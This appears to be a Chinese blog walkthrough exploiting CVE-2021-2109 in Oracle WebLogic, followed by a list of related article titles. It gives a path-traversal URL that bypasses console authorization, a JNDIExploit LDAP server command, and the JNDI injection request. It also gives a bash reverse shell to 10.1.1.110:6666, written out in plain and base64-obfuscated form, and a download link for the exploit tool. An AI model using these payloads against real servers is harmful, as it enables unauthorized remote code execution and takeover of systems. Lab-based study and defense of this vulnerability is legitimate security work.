零基础学黑客,搜索公众号:白帽子左一

作者:掌控安全-逍遥子

1.影响版本:
WebLogic Server10.3.6.0.0、12.1.3.0.0、12.2.1.3.0、12.2.1.4.0、14.1.1.0.0

实验环境:
攻击机:kalilinux 10.1.1.10
靶机: 10.1.1.109

2.weblogic未授权访问:

对目标地址的7001端口直接访问

构造绕过授权url: ip:7001/console/css/%252e%252e%252f/consolejndi.portal 其中%252e%252e%252f是…/的二次url编码。成功访问到控制台,如果第一次未成功需要进行刷新。

此处存在weblogic的未授权访问,该版本受到影响。

3.远程代码执行
a.
启动需要攻击使用的ldap脚本 java -jar JNDIExploit.jar -i ip
下载地址:github的链接已经失效,我放在附件的位置。

配合WebLogic未授权漏洞进行代码执行:
/console/css/%252e%252e/consolejndi.portal_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://10.1.1;110:1389/Basic/WeblogicEcho;AdminServer%22)
注意:使用ldap的第三个分隔符使用的是;,不是.
构造一个传参为cmd,即为我们执行的命令。

b.
另外开启一个终端,运行漏洞的poc。设置响应的参数,看到成功执行,并且获取到了shell。


c.利用漏洞生成反弹shell。
将bash反弹命令bash -i >&/dev/tcp/10.1.1.110/6666 0>&1进行base64编码转换:bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xLjEuMTEwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}
然后使用nc对本地的端口进行一个监听。


成功获取到shell

链接:https://pan.baidu.com/s/10DyEYAFrCbtQ5wKTAy_7-g
提取码:zkaq

Weblogic未授权访问以及LADP远程代码执行(CVE-2021-2109)相关推荐

  1. 二十八种未授权访问漏洞合集(暂时最全)

    目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 ...

  2. 常用的30+种未授权访问漏洞汇总

    未授权访问漏洞汇总预览 1 .FTP 未授权访问(21) 2 .LDAP 未授权访问(389) 3 .Rsync 未授权访问(873) 4 .ZooKeeper 未授权访问(2181) 5 .Dock ...

  3. JBoss未授权访问漏洞Getshell过程复现

    文章目录 前言 漏洞复现 漏洞描述 靶场搭建 漏洞利用 防御手段 Jexboss脚本 前言 在 2021 年第五届强网杯全国网络安全挑战赛的 EasyWeb 赛题中遇到了 JBoss 未授权访问漏洞 ...

  4. Jenkins未授权访问

    Jenkins Jenkins简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,它能把软件开发过程形成工作流.默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一 ...

  5. Gitea 1.4 未授权远程代码执行漏洞复现

    ​Gitea 1.4 未授权远程代码执行 一.漏洞描述 Gitea是从gogs衍生出的一个开源项目,是一个类似于Github.Gitlab的多用户Git仓库管理平台.其1.4.0版本中有一处逻辑错误, ...

  6. CVE-2021-30461 - VoIPMonitor未授权远程代码执行漏洞

    VoIPMonitor未授权远程代码执行漏洞 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标 0X042 测试代码执行 0X005 PO ...

  7. Docker远程API未授权访问导致的Docker逃逸

    Docker远程API未授权访问导致的Docker逃逸 前言 是给社团学弟学妹们一次讲课的一次md. 服务器 https://cloud.tencent.com/act/campus 当然想要复现学习 ...

  8. 通达OA未授权任意文件上传及文件包含导致远程代码执行漏洞

    0x00 前言 通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台. 0x01 漏洞简 ...

  9. Weblogic反序列化远程代码执行漏洞(CVE-2019-2725)

    漏洞简述 2019年4月17日,CNVD 发布<关于Oracle WebLogic wls9-async组件存在反序列化远程命令执行漏洞的安全公告>,公告指出部分版本WebLogic中默认 ...

最新文章

  1. Java 理论与实践: 正确使用 Volatile 变量
  2. 《精通Nginx》——1.2 从源代码安装Nginx
  3. 惠普搜客户机t5740升级硬盘_惠普暗影精灵5首测重磅来袭:更多选择 更强性能...
  4. Git 使用篇一:初步使用GitHub,下载安装git,并上传项目
  5. python换行输入数据_python将回车作为输入内容的实例
  6. 使用ADF BC管理保存点
  7. m_Orchestrate learning system---二十二、html代码如何变的容易
  8. sql 查询所有数据库-表-表结构
  9. html5 调用高德地图,高德地图在h5项目中的集成(点标记)
  10. Mysql中循环拼接参数_利用循环向数据库中插入数据,参数重复的问题
  11. 【ArcGIS|空间分析】查找成本最低路径
  12. js调用摄像头拍照上传图片
  13. Arduino AT24C02详解读写地址位
  14. 金蝶服务器选项没有账套信息,金蝶财务软件帐套属性设置保存和帐套启用报错的解决方法...
  15. 为Springboot工作流版本myabaits的xml 建表
  16. 视图之模板赋值和模板渲染
  17. linux bt 命令行,在Linux终端下进行BT下载
  18. POJ 2248【加法链】
  19. Java+Swing+mysql用户信息管理系统
  20. SQL优化之六脉神剑

热门文章

  1. JavaWeb实现一个在线信息发布平台网站
  2. Blender基础入门(2):Blender简单渲染
  3. URLEncoder.encode转码GET请求参数
  4. 文件比较工具-BCompare的简单使用
  5. 碳纳米管包四氧化三铁Fe3O4纳米粒子|氧化石墨烯包覆Fe3O4空心球纳米复合材料(r-GO/Fe3O4)|齐岳
  6. Ranger 编译安装
  7. 微信access_token如何保存
  8. java8 嵌套循环_Java 8嵌套循环流
  9. AVT工业相机Windows、Opencv开发——相机的配置
  10. Kubernetes入门教程 --- 使用二进制安装